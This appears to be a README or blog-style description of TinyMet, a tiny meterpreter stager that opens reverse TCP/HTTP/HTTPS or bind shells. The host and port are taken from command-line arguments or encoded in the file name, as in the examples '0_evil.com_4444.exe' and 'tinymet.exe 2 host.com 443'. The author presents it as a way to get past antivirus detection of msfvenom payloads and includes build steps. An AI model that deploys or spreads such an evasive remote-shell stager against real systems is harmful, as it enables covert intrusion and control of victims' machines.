TinyMet is a tiny “4.5 kilobytes” flexible meterpreter stager, which supports multiple meterpreter transports, setting LPORT and LHOST during runtime.
Transport, LPORT and LHOST are set during runtime through either of the following:
- Command line arguments.
- Naming the .exe file in a special way.
What’s new in v0.2:
- Now tinymet can parse the Transport, LPORT and LHOST from its own filename through separating them by underscore
- Example: “0_evil.com_4444.exe” will use reverse_tcp, LHOST=evil.com, LPORT=4444
- This makes tinymet more (double-click/payload-like/argument-less) friendly.
Available transports are as follows:
- 0: reverse_tcp
- 1: reverse_http
- 2: reverse_https
- 3: bind_tcp
tinymet.exe TRANSPORT LHOST LPORT
Example: "tinymet.exe 2 host.com 443" Will use reverse_https and connect to host.com:443
Usage#2: name the file using the following convention and run without args:
Example: Setting the filename to "2_host.com_443.exe" and running it without args will do exactly the same as Example#1.
Some context for those who are interested
Evading antivirus remains a challenge for those who are trying to use msfvenom to create their stand-alone “exe” payloads, and no matter how hard one tries to achieve that using whatever is already in the framework, or tools written by others, results are largely unreliable.
I guess another way to approach the problem would be : 1) understand how the framework works, 2) write your own stager/payload.
- Meterpreter by design is a “staged” payload, it consists of a “stager” and a “stage”; when msfvenom are used to create an exe, that’s the “stager” part of meterpreter, which when executed, gets the larger “stage” from the exploit/multi/handler, and does the necessary to have it executed.
- Stand-alone meterpreter executables that are created using msfvenom are not flexible in selecting the transport, LHOST or LPORT after being created … i.e. once you create the exe, you cannot change any of the settings you specified during the creation of the executable.
Compiling from source
- Install masm32 in c:\masm32 “I’m using its msvcrt.lib”
- Install Microsoft Visual Studio Express 2013 for Windows Desktop (VS 2015 WILL NOT WORK IF YOU DO NOT HAVE 2013, they changed the compiler in 2015)
- Clone TinyMet from Github, or just download the latest version as zip.
- Open the solution, chose “Release”, click build “F7”.
Why are you not using argc and *argv to parse the command line?!
- To bring size down, all default libraries needs to be removed.
- Downside is: default libraries are the ones which populate argc and argv, that’s why winapi(s) were used `GetCommandLineW() & CommandLineToArgvW()`.
… I was learning assembly and reversing in general through writing code in C, compiling, then reversing it to see how it looks like, and started with my other project “ultimet” … then thought about doing something useful on the way, that’s how tinymet was born.
Comments are welcome 🙂